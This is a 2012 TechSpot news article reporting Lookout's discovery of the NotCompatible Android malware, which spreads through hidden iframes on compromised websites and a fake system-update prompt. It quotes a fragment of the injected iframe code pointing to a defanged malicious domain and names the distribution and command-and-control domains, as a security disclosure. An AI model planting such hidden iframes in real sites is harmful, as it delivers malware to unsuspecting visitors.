also @ TechSpot: Google quietly adds conversational search to Chrome 27

New Android malware spreads via infected websites

By

On May 3, 2012, 4:00 PM With Video

google, android, malware, security, browser, infection, spyware, lookout, viruses, notcompatib

Mobile security firm, Lookout, warns of a new malware which may be spreading itself to unsuspecting Android handsets and tablets. Coined as "NotCompatible", the malware is being propagated via Android's web browser which is thought to be a first for the mobile OS. 

Before mass panic sets in through, there are a couple of things Android users should know. First, the malware doesn't seem to do anything malicious -- not yet. Secondly, NotCompatible still requires user intervention in order to install it.  

Although viruses, trojans and other digital nasties commonly exploit browser vulnerabilities in the computer realm, there have been very few examples of this in the mobile universe. NotCompatible doesn't actually exploit Android's web browser; moreover, it takes advantage of some poor design decisions which can be used to trick less sophisticated users into installing it.

Here's how it works: The bug lives in a hidden iframe on infected websites. The malware then spreads itself by sending an infected .apk file to the user's phone or tablet guised as an automatic download (which Android's browser allows). As with any virus or malware, just downloading it isn't enough though -- it needs to be executed. Once the file is finished downloading, the website alerts the user that a new system update is available. If an unsuspecting user falls for the notification, it will install the .apk file and give NotCompatible ongoing access to the device.

Infected websites commonly have the following code inserted into the bottom of each page:
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

Source: blog.mylookout.com

Although NotCompatible doesn't have any known payload or risk at the moment, it is possible that the malware could function as a trojan or proxy to something more malicious. 

Two domains which currently house the malware, gaoanalitics.info and androidonlinefix.info, were singled out. According to Lookout though, there are many more. The firm also says the command and control domain seems to be notcompatibleapp.eu which happens to be the origin of its namesake.

, , , , , , , , ,

Post a comment

Related Products from Product Finder

AT&T iPhone 4S 88

AT&T iPhone 4S

The iPhone 4S looks identical to last year's model but comes in a new 64GB flavor and upgrades the camera to include an 8-megapixel sensor with improved low-light performance and 1080p video capture. In terms of performance the new iPhone is reportedly up to 2x faster and is also capable of running on faster HSPA+ networks, reaching theoretical download speeds of up to 14.4Mbps.

68 Reviews

Asus Transformer Pad TF300 80

Asus Transformer Pad TF300

The Asus Transformer Pad TF300 has a 10.1-inch LED Backlight WXGA (1280x800) ISP screen with scratch-resistant glass, a 178° viewing angle, and 10-finger multitouch support. Wireless connectivity includes 802.11b/g/n@2.4GHz and Bluetooth 3.0+EDR. The TF300 uses a 22Wh Li-polymer battery that is said to provide 10 hours of operating time. It also carries various sensors including a G-Sensor, Light Sensor, Gyroscope, E-compass, and GPS.

26 Reviews

Samsung GT-I5800 Galaxy 3 / Teos / Galaxy 580 72

Samsung GT-I5800 Galaxy 3 / Teos / Galaxy 580

Read expert reviews, pros & cons, and product information about Samsung GT-I5800 Galaxy 3 / Teos / Galaxy 580. There are 35 reviews available so far.

20 Reviews

Samsung SPH-D720 Nexus S 4G 80

Samsung SPH-D720 Nexus S 4G

Read expert reviews, pros & cons, and product information about Samsung SPH-D720 Nexus S 4G. There are 17 reviews available so far.

9 Reviews

Post a new comment

Social Login & Guest Posting TechSpot Members
Login here or sign up for free,
it takes about a minute.
Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.
TechSpot on:

Most Popular

Trending Featured
More Trending Topics

Downloads and Drivers

Downloads   Drivers  

1by1 1.79

Blender 2.67a for Mac OS X

GeForce Experience 1.5.0.0

Google Chrome for Android 27.0.1453.90

HWiNFO64 4.19-1935 Beta

More Downloads

Latest Discussion

Keep getting Windows not valid popup 27 replies on Windows OS

IPod Home Button Problems 12 replies on Other Hardware

Where should & can I upgrade? 8 replies on Other Hardware

Which is the best smartphone to buy? 23 replies on Mobile Computing

Screen saver stop working after installing Norton 8 replies on Software Apps

More Recent Discussion

Subscribe to TechSpot

Get free exclusive content, learn about new features and breaking tech news.